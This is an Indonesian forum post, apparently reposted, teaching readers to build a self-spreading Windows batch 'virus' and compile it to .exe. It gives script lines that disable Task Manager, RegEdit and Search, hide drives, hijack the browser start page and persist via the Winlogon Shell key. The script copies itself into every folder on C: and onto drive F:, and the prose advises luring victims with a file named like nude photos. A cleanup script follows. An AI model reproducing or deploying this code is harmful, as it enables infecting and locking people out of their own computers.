15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", "29", "REG_DWORD">>c:\windows\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "1", "REG_DWORD">>c:\windows\gila.vbs
17. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD">>c:\windows\gila.vbs
18. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD">>c:\windows\gila.vbs
19. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "1", "REG_DWORD">>c:\windows\gila.vbs
20. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://fanaticanz.blogspot.com", "REG_SZ">>c:\windows\gila.vbs
21. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe C:\WINDOWS\exploler.exe", "REG_SZ">>c:\windows\gila.vbs
22. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "rastaman", "REG_SZ">>c:\windows\gila.vbs
23. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "fanatiCanz", "REG_SZ">>c:\windows\gila.vbs
24.

25. :lanjut
26. call c:\windows\gila.vbs
27. if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki
28. for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe "%%d"
29. Goto ceki
30.

31. :infek1
32. for %%a in (*.exe) do if %%~za equ 12345 copy "%%a" %systemroot%\exploler.exe
33. Goto ceki
34.

35. :infek2
36. Copy c:\windows\exploler.exe c:\”gambar lucu”.exe
37. Goto ceki
38.

39. :infek3
40. Copy c:\windows\exploler.exe f:\”koleksi kartun flash”.exe
41. Goto ceki
42.

43. ekf
44. if exist f:\”koleksi kartun flash”.exe Goto ceki
45. Goto infek3

46.


47. eki
48. if not exist c:\windows\exploler.exe Goto infek1
49. if not exist c:\”gambar lucu”.exe Goto infek2
50. if exist f:\ Goto cekf
51.

52. Goto ceki

Waaahhhh……… panjang ya?jangan bilang iya, soale mungkin nanti disaat menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!! Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas.

Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensi-nya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan 33 yang “for %%a in dst….” Diganti jadi “copy %0 tujuan dan nama file nya”.

Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan pake quickbfc lalu compile dengan ektensi .exe namanya terserah, contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan berdoalah semoga kompie calon korban ngga pake anti virus!.

Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan dapet penjelasan dari script diatas!

Dan penjelasannya adalah:
Baris
1. Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini adalah proyek ghost application! Tapi bodo ah!!)
2. Ini perintah untuk mengecek keberadaan file explorer.exe di drive c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung menuju parameter perintah lanjut, tapi kalo belum ada maka akan dilanjutkan ke baris selanjutnya.
3. perintah untuk menyalin program ini ke folder c:\windows dengan nama explorer.exe yang selanjutnya akan menjadi file induk program ini. Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi .bat maka perintah “for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe” diganti jadi “copy %0”. Nah, kalo pake software Quickbfc perintah “copy %0” tidak berfungsi. (lengkapnya baca artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD)
4. perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\ dengan nama “rahasia gua.exe
5. perintah di baris ini sampai baris 23 adalah perintah yang menggunakan parameter > dan >> untuk membuat sebuah file Visual Basic Script yang bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang memblok akses ke registry –antivirus yang saya pake ANTIvir, file .vbs ini berjalan mulus –berarti sukses. Tetapi ketika saya coba pake xxxx ada warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau dikarantin-.

Sukur-sukur si calon korban ga make anti virus, tentram damai program ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan “are you sure want to add the information in nama_file.reg to the registry?” ga efisien banget kan? Oke, kembali ke….? Registry. Dan registry yang di isi adalah :


1. Menghilangkan menu RUN
2. Menyembunyikan drive A, C, D dan E di windows explorer
3. Menyembunyikan semua file di drive A, C, D dan E windows explorer (bakalan ada pembatasan!)
4. Men-disable kan menu RegEdit
5. Menghilangkan menu Folder Option
6. Menghilangkan menu Search
7. Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan)
8. Mengganti alamat default Internet Explorer menjadi http://fanaticanz.blogspot.com
9. Menjadikan file exploler.exe di drive c:\windows yang tadi disalin(copy) selalu dijalankan ketika computer di hidupkan lagi walaupun windows masuk ke dalam safe mode!
10. Entry yang ini bakalan merubah nama owner organitation(coba deh kalian klik kanan di my computer trus pilih properties, dan liat di situ ada tulisan "registered to:”) nah, entry yang satu ini akan merubah nama organization yang tadinya apapun menjadi “rastaman”
11. Sama, entry yang satu ini juga merubah nama owner (cek lagi aja di properties my computer) yang tadinya apapun menjadi “fanaticanz”

Puh.. selesai juga tentang Registry…. Masih mau lanjut???? lanjut mang……………
24. kosong
25. ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26 – 28
26. ini perintah yang akan mengeksekusi file gila di folder c:\windows
27. ini perintah yang mempertanyakan keberadaan file legalin ganja dong by fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter perintah ceki
28. ini perintah untuk menggandakan file induk exploler.exe yang ada di drive C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan nama legalin_ganja_dong_by_fanatiCanz.exe ((((thank’s a lot for tomplix))))
29. ini perintah untuk langsung menuju parameter perintah ceki (baris 47)
30. kosong
31. ini parameter yang membuat kumpulan perintah bernama infek1 yang berisikan perintah dari baris 33 – 34
32. perintah ini untuk menyalin file program ini dan sedang dijalankan (eksekusi) ke folder c:\windows dengan nama exploler.exe
33. ini perintah yang merujuk langsung ke parameter perintah ceki
34. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
35. parameter yang membuat kumpulan perintah bernama infek2 yang berisikan perintah dari baris 37 – 38.
36. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan nama gambar lucu.exe
37. ini perintah yang langsung merujuk ke perintah ceki
38. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
39. ini parameter yang membuat kumpulan perintah bernama indek3 yang berisikan perintah dari baris 41 – 42
40. ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan nama koleksi kartun flash.exe
41. ini perintah yang merujuk langsung ke parameter perintah ceki
42. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
43. ini parameter yang membuat kumpulan perintah bernama cekf yang berisikan kumpulan perintah dari baris 45-46
44. ini perintah yang mempertanyakan keberadaan file koleksi kartun flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek maka akan dilanjutkan ke perintah pada baris selanjutnya.
45. ini perintah yang langsung merujuk kepada parameter perintah ceki
46. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
47. ini parameter yang membuat kumpulan perintah bernama ceki yang berisikan kumpulan perintah dari baris 49-51.
48. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah) dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan perintah yang sama pada baris 3 dan 33.
49. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2
50. ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju perintah selanjutnya
51. kosong
52. ini perintah untuk kembali lagi ke parameter perintah ceki, semcam looping lah…


Puuhhh………….. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan dijawab iya!). Namanya juga belajar, bersusah-susah dululah,Oya buat kamu yang masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca :

1. Buku “Pemrograman Virus dan SpyWare [uncensored]” karya Wardana, R, S.Hut terbitan Jasakom
2. Artikel tomPLIX yang judulnya “Membuat Virus dengan Perintah CMD” di situs jasakom.com
3. semua yang berhubunagn dengan registry

Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga adil dong, masa ngasih penyakitnya doang! (iya ga?)
Script Pemulih nya sebagai berikut ;

1. @echo off
2. title Script Pemulih virus-virusan –rasta-Farian.B
3. echo on error resume next>c:\gila.vbs
4. echo Dim WshShell, f1, fso>>c:\gila.vbs
5. echo set WshShell = CreateObject("Wscript.Shell")>>c:\gila.vbs
6. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\gila.vbs
7. echo set f1 = fso.GetFile("c:\windows\exploler.exe")>>c:\gila.vbs
8. echo set f2 =fso.GetFile(“c:\windows\gila.vbs”)
9. echo f1.Attributes = "0">>c:\gila.vbs
10. echo f2.Attributes = “0”>>c:\gila.vbs
11. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD">>c:\gila.vbs
12. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "0", "REG_DWORD">>c:\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrives", "0", "REG_DWORD">>c:\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD">>c:\gila.vbs
15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD">>c:\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "0", "REG_DWORD">>c:\gila.vbs
17. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe", "REG_SZ">>c:\gila.vbs
18. call c:\gila.vbs
19. pause
20. Goto del1
21. kosong
22. el1
23.

24. del %systemroot%\exploler.exe pause
25. Goto del2
26.

27. for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del "%%d"
28. pause
29. Goto del3
30.

31. el3
32. del c:\"gambar lucu".exe
33. pause
34.

35. el4
36. del %systemroot%\gila.vbs
37. pause

Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(-virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16 dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi. Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin keperintah selajutnya, dan seterusnya.

Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe, cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua “ritual” diatas selesai, computer yang terinfek akan kembali seperti semula. SEMaNgat BrO..


Repost...
Harus cantumkan alamat link bersangkutan gan
Very Happy

hackerjimeowam
Support
Support

Posts : 110
CGPoints : 12032
Reputation : 3
Join date : 23.05.10
Age : 25

Kembali Ke Atas Go down

Re: Tutorial Membuat BAT MENJADI EXE dan tutorialnya

Post  Sponsored content Today at 4:52 am


Sponsored content


Kembali Ke Atas Go down

Halaman 1 dari 2 1, 2  Next

Topik sebelumnya Topik selanjutnya Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik